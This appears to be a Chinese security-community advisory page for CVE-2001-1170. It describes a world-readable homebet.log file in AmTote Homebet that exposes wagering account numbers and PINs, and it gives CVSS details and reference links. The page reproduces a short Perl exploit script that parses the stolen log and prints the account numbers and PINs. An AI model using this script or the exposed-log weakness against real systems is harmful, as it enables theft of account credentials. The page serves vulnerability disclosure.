CVE-2001-1170
CVSS5.0
发布时间 :2001-09-29 00:00:00
修订时间 :2008-09-10 15:09:48
NMCOES    

[原文]AmTote International homebet program stores the homebet.log file in the homebet/ virtual directory, which allows remote attackers to steal account and PIN numbers.


[CNNVD]AmTote Homebet全域可访问日志漏洞(CNNVD-200109-135)

        AmTote International homebet将homebet.log文件存储在homebet/ virtual目录下,远程攻击者可以利用该漏洞窃取账户和PIN号。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1170
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1170
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-135
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/3370
(VENDOR_ADVISORY)  BID  3370
http://xforce.iss.net/static/7186.php
(VENDOR_ADVISORY)  XF  homebet-view-logfile(7186)
http://archives.neohapsis.com/archives/bugtraq/2001-09/0235.html
(UNKNOWN)  BUGTRAQ  20010929 Vulnerability in Amtote International homebet self service wagering system.

- 漏洞信息

AmTote Homebet全域可访问日志漏洞
中危 配置错误
2001-09-29 00:00:00 2005-10-20 00:00:00
远程  
        AmTote International homebet将homebet.log文件存储在homebet/ virtual目录下,远程攻击者可以利用该漏洞窃取账户和PIN号。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21115)

AmTote Homebet 0 World Accessible Log Vulnerability (EDBID:21115)
multiple remote
2001-09-28 Verified
0 Gary O'Leary-Steele
N/A [点击下载]
source: http://www.securityfocus.com/bid/3370/info

AmTote Homebet is an Internet-based account wagering interface.

Homebet stores all account and corresponding PIN numbers in the homebet.log file stored in the Homebet virtual directory. On a default installation, the homebet.log file is world readable. This could allow an attacker to steal the log file and strip out the account and PIN numbers.

$logfile='c:\windows\desktop\homebet.log'; ##change as required
print "Extracting Account/pin numbers";
open(INFILE,$logfile);
while(<INFILE>){
($accn,$pin)=split(/account=/,$_);
if ($pin){print "Account Number=".$pin;}
}
		

- 漏洞信息

9788
AmTote International homebet homebet.log Account Information Local Disclosure
Local Access Required Information Disclosure
Loss of Confidentiality
Exploit Unknown

- 漏洞描述

AmTote International homebet contains a flaw that may lead to an unauthorized information disclosure. The problem is that the 'homebet.log' file in the /homebet directory is world-readable, which may allow a local attacker to obtain account information and PIN numbers resulting in a loss of confidentiality.

- 时间线

2001-09-29 Unknow
2001-09-29 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

AmTote Homebet World Accessible Log Vulnerability
Configuration Error 3370
Yes No
2001-09-28 12:00:00 2009-07-11 07:56:00
This vulnerability was discovered by Gary O'leary-Steele <GaryO@sec-1.com>.

- 受影响的程序版本

AmTote Homebet 0

- 漏洞讨论

AmTote Homebet is an Internet-based account wagering interface.

Homebet stores all account and corresponding PIN numbers in the homebet.log file stored in the Homebet virtual directory. On a default installation, the homebet.log file is world readable. This could allow an attacker to steal the log file and strip out the account and PIN numbers.

- 漏洞利用

The following script provided by Gary O'leary-Steele &lt;GaryO@sec-1.com&gt; will extract account and PIN numbers from the homebet.log file:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站